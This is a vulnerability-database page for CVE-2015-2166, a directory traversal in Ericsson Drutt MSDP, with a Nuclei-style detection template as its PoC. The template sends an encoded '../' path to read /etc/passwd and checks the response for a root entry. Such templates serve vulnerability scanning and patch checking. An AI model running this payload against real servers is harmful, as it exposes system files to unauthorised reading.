CVE-2015-2166: Ericsson Drutt MSDP - Local File Inclusion

2025-08-01 Ericsson Drutt MSDP PoC Public

Description

Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.

PoC

id: CVE-2015-2166

info:
  name: Ericsson Drutt MSDP - Local File Inclusion
  author: daffainfo
  severity: medium
  description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the Ericsson Drutt MSDP application.
  reference:
    - https://www.exploit-db.com/exploits/36619
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2166
    - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html
    - https://www.exploit-db.com/exploits/36619/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-2166
    cwe-id: CWE-22
    epss-score: 0.26774
    epss-percentile: 0.97923
    cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ericsson
    product: drutt_mobile_service_delivery_platform
  tags: cve2015,cve,lfi,ericsson,edb,packetstorm,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200dbebf54c12438bbfdfeb68dc207b193583c5ac474f1baa7c4351b94db17adea022100cbea972283822e796a7c43995e617b42aae63ba3d2b21c8f12d028db420cd8d8:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities